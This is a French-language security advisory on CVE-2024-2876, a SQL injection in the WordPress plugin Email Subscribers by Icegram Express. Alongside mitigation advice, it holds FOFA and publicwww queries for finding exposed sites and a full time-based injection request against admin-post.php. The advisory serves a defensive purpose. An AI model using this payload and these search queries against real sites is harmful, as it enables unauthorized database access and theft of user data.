
CVE-2024-2876 est une vulnérabilité de sécurité critique découverte dans le plugin « Email Subscribers by Icegram Express » pour WordPress. Cette vulnérabilité affecte les versions jusqu'à la 5.7.14 incluse et présente des risques importants pour plus de 90 000 sites Web.
La vulnérabilité est une faille d'injection SQL qui permet à des attaquants non authentifiés d'exécuter des requêtes SQL malveillantes sur les bases de données WordPress affectées. En manipulant des entrées utilisateur qui ne sont pas correctement assainies, les attaquants peuvent extraire des informations sensibles telles que des noms d'utilisateur, des adresses e-mail, des hachages de mots de passe et des listes d'abonnés.
L'injection SQL se produit dans la fonction run de la classe IG_ES_Subscribers_Query du plugin, où une validation insuffisante des entrées conduit à une exécution non autorisée de code SQL. Cela compromet l'intégrité et la confidentialité des données stockées dans la base de données WordPress.
FOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
Mise à jour immédiate : Si vous utilisez le plugin « Email Subscribers by Icegram Express », mettez à niveau vers la version 5.7.15 ou une version ultérieure immédiatement pour appliquer le correctif de sécurité.
Audits réguliers : Examinez et mettez à jour régulièrement tous les plugins et thèmes WordPress vers leurs dernières versions pour garantir la sécurité.
Plugins de sécurité : Utilisez des plugins de sécurité WordPress réputés pour renforcer les défenses contre l'injection SQL et d'autres menaces informatiques.
Politiques de mots de passe forts : Mettez en place des mots de passe forts et uniques pour tous les comptes liés à votre site WordPress afin de réduire les risques d'accès non autorisé.
Ne pas mettre à jour le plugin affecté peut laisser les sites Web vulnérables aux violations de données et aux accès non autorisés. Compte tenu de l'utilisation répandue de ce plugin, une action immédiate est cruciale pour sécuriser les installations.